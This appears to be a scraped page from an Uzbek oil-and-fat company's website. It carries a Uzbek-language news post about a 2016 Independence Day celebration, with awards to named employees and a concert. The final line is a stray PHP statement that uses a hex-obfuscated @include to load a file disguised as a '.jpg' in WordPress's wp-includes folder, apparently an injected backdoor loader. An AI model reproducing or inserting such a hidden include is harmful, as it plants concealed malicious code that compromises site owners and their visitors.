А A
 
Эшитиш учун керакли матн ни белгиланг

11:19 | 30.08.2016

Диёримиз Мустақиллигининг 25-йиллиги муносабати билан жамиятда байрам тадбири бўлиб ўтди.

Тадбир муносабати билан “Ўзпахтасаноатэкспорт” Холдинг компаниясининг Ходимлар билан ишлаш хизмати бошлиғи Ф.Р. Ақбаров сўзга чиқиб, Компания бош директори А.С.Камаловнинг “Урганч ёғ-мой” меҳнат жамоаси аъзоларига йўллаган табрик сўзини ўқиб эшиттирди.

  Жамиятнинг кўп йиллик самарали меҳнати, ижтимоий-сиёсий ҳаётдаги фаол иштироки билан жамиятимиз, юртимиз равнақига муносиб ҳисса қўшиб келаётган ишчи-хизматчилар: жамиятнинг бош технологи — Раджабов Джалолиддин Камилович, Экстракция цехи бошлиғи Яқубов Алишер Атабаевич ва тайёрлов участкаси УСМ участкаси устаси — Бабаджанов Камоладдин Сабировичлар “Ўзпахтасаноатэкспорт” Холдинг компанияси томонидан фаҳрий ёрлиқ ва қимматбаҳо совғалар (“Artel” русумли электродуховка) билан тақдирландилар.

Шунингдек, “Ўзпахтаёғ” Акциядорлик жамияти томонидан жамиятнинг ёғ кислоталарини хайдаш участкаси хайдаш аппаратчиси Худайберганов Султонбой Ўрозбоевич, Совун ишлаб чиқариш цехи чилангари Разақов Хушнуд Қаландарович ва Экстракция цехи дистилляция аппаратчиси Шарипов Уразали Машарипович фаҳрий ёрлиқ ва “Artel” русумли LCD телевизорлар билан тақдирландилар.

Шундан сўнг жамият бош директори в.б. Атаев Хурмат Азадович жамият раҳбарияти номидан меҳнат жамоаси аъзоларини байрам билан самимий табриклаб, корхонанинг 41-та ишчи-хизматчисини фаҳрий ёрлик ва гиламлар билан тақдирлади.

Тадбир “Огаҳий” вилоят мусиқа ва драма театри ходимларининг иштирокида байрамона кайфиятда ўтди.

Санъат вакилларининг чиқишлари орасида жамиятнинг меҳнат фаҳрийлари сўз олиб, “Ўзпахтасаноатэкспорт” ХК, “Ўзпахтаёғ” АЖ ва жамият раҳбариятига табриклар ва уюштирилган тадбирлар учун ўз миннатдорчиликларини билдириб, ўзларининг самимий ниятларини тилаб қолдилар.

Тадбир давомида “ЎзЛиДеп” вилоят Кенгаши депутатлик гуруҳи раҳбари Б.Рўзметов ва жамият касаба уюшмаси қўмита раиси Г.Бекмуротова сўзга чиқиб, тадбир қатнашчиларини байрам муносабати билан қутлаб, ўз совғаларини жамият фаоллари ва меҳнат фаҳрийларига топширдилар.

Жамиятда ишлайдиган кўп фарзандли ходимларни ижтимоий қўллаб-қувватлаш мақсадида мактаб анжомлари ва ўқув қуроллари берилди.

Диёримиз мустақиллигининг 25-йиллик муносабати билан жамиятда ўтказилган байрам доирасида санъаткорлар томонидан намойиш этилган концерт дастури тадбирга қўшимча файз бағишлади.

slidde1

slidde1

Ишонч телефони

phoneblue

+998 62 224-57-57 +998 62 224-57-58

Сайт сўровномаси

Соглом она соглом бола йили

Апрел 2025
Пн Вт Ср Чт Пт Сб Як
« Dec    
 123456
78910111213
14151617181920
21222324252627
282930  
Узбекистон Республикаси очик маълумотлар портал

Сайтдаги маълумотлардан фойдаланганда urganchyog.uz манбаа сифатида кўрсатилиши шарт.

URGANCH YOG-MOY AKSIYADORLIK JAMIYATI

Хоразм вилояти, Урганч шаҳар, Досов кўчаси 1 уй.

Сайтнинг сўнги янгиланган санаси:
2016, 23 июнь, Пайшанба, соат 09:30

Тепага
@include(pack('H*', '77702d696e636c756465732f696d616765732f77702d736b696e2e6a7067'));